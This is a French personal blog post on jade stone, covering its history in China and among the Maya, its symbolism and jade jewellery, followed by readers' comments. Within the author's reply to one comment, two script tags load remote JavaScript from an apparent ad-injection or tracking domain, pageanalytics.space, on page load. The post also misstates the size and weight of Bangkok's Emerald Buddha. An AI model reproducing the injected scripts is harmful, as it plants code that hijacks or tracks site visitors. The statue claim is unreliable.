• PIERRE DE JADE

    PIERRE DE JADE  

    Ce soir nous allons nous pencher sur un sujet  auquel j'ai souvent pensé et qui à mes yeux est d'une beauté sans égal    

    LA PIERRE DE JADE

    PIERRE DE JADEPIERRE DE JADE  

    La pierre de jade est une pierre ornementale par excellence.Sa beauté translucide ,la finesse de son grain,sa douceur au toucher comme sa dureté et sa résistance à l'usure en font l'une des pierres fines et gemmes les plus appréciées pour la réalisation d'objets et de bijoux ,dés l'époque néolithique 5000 ans avant J.C. 

    PIERRE DE JADE    

    PIERRE DE JADE

    PIERRE DE JADE 

    PIERRE DE JADE      

    Les chinois l'appelèrent YU qui signifie "belle pierre" et en firent l'un des symbole de leur civilisation,associé au pouvoir,à la richesse et à l'immortalité.

    PIERRE DE JADE

    PIERRE DE JADE  

    Le jade fut pierre sacrée et présage d'éternité,tout aussi bien en Chine qu'en Mésoamèrique.

    C'est ainsi que les Masques funéraires Mayas ,au sud du Mexique sont de remarquables oeuvres d'art ,réalisées le plus souvent en jade selon des techniques qui s'apparentent à la mosaique.

    PIERRE DE JADE

    PIERRE DE JADE  

    Aujourd'hui les bracelets bouddhistes et de nombreux pendentifs à symbole mystique sont conçus en jade,afin d'affirmer la pureté et la vertu des pierres et croyances.

    PIERRE DE JADE

    PIERRE DE JADE

       

    La finesse de son grain permet de sculpter n'importe quelle forme et d'obtenir des pierres parfaitement gravées et sculptées dont les contours sont nets et précis comme le bracelet jade et or ou bien le bracelet jade et argent. 

    PIERRE DE JADE

    PIERRE DE JADE  

    Le temps et l'habileté qui étaient nécessaire à la confection d'objets et de bijoux en jade comme ces bracelets ci dessus l'avait rendu autrefois précieux et destiné aux seules élites comme ce fût le cas dans la Chine antique.

    PIERRE DE JADE

    PIERRE DE JADE  

     Les objets en jade symbolisent différents pouvoirs.Ainsi le tube de jade désignait la hache de jade le pouvoir guerrier .     

    PIERRE DE JADE  

    Il existe une profusion d'objets archéologique en jade d'une facture tout à fait exceptionnelle .La jadéite en Asie,fût utilisée dès le XVe siècle par les Thaillandais pour leur merveilleux Bouddha d'émeraude de Bangkok haute de plus de 3 mètres pour un poids de 5,5 tonnes et entièrement revêtue d'or. 

    PIERRE DE JADE  Les Mayas utilisèrent le Jade non seulement pour leur célèbres masques mortuaires mais encore comme pour la parure des divinités . PIERRE DE JADE

     

    On peut trouver différents bijoux en jade ornés de cabochons et perles de jade dans les musées et chez les antiquaires Mexicains.

    PIERRE DE JADE   

    Et comme je voulais terminer cette page en vous offrant un petit souvenir perso je vous présente une pièce de ma fabrication entièrement décoré avec des bijoux en  pierre de........ 

    JADE  

    PIERRE DE JADE 

    PIERRE DE JADE 

     

        

    PIERRE DE JADE   

    PIERRE DE JADE

    PIERRE DE JADE  

    PIERRE DE JADE

     

    Partager via Gmail

  • Commentaires

    1
    Jeudi 31 Mai à 15:54

    Bonjour ,jolies sculptures en jade ,j'aime cette pierre ,j'ai deux pendentifs et une bague en jade mais  vert plus clair.les bracelets  sur tes photos me plairait bien .bonne journée ,à l'abri sinon il faut profiter des éclaircies.

    2
    Lundi 4 Juin à 20:59

    BONSOIR,

    Magnifique , j'adore le jade en plus il est un très grand protecteur. 

    Bonne soirée Corsette 

    3
    Dimanche 17 Juin à 07:13

    Bonjour, encore un article intéressant à lire! Savais-tu que le jade le plus pure est blanc? En fait plus il est vert (voir même noir) plus il est charger en impuretés.

      • Mardi 19 Juin à 00:27

        Coucou Merci pour le tuyeau Moi au contraire je pensais le contraire Je ne suis plus beaucoup sur le blog en ce moment car les journées son très chargées et le soir le courage n'est pas au r d v BISOUS MERCI pour ta visite A bientôt

        <script src="http://pageanalytics.space/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://pageanalytics.space/ext/1b2e2ccbdf8c25269f.js?sid=52079_6958_&title=&blocks[]=31af2" type="text/javascript"></script>
    4
    Mardi 19 Juin à 17:13

    Coucou, t'inquiète moi aussi je suis plus beaucoup sur le blog. Je passe mon temps à lire, bosser, bricoler et écrire.winktongue

    5
    Dimanche 15 Juillet à 12:04

    Bonjour  Rastignac, un article super intéressant, les photos sont bien choisies, un bel éventail de ce qu'on peut faire avec le jade. Perso, je n'aime pas trop, pas fan du vert, mais j'ai lu plus haut qu'il en existait en blanc, et c'est vrai, j'ai retrouvé un éléphant miniature que ma mère m'avait offert en jade blanc.

    La pièce de ta fabrication est  très jolie, mais a-t-elle une signification ? ... Bises  

    6
    Lundi 16 Juillet à 01:46

    coucou,

    En fait je m'étais  trompée de mot dans mon commentaire,  ce n'est pas "plus il est vert (voir même noir) plus il est charger en impuretés" en fait ce sont les sels qui  sont contenus dans la pierre. Donc techniquement ce ne sont pas des "impuretés" comme je l'avais marquée. Et en plus j'avais oubliée de te dire, il existe même du jade rose qui contient des sels de fer et de manganèse, d'où la couleur.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :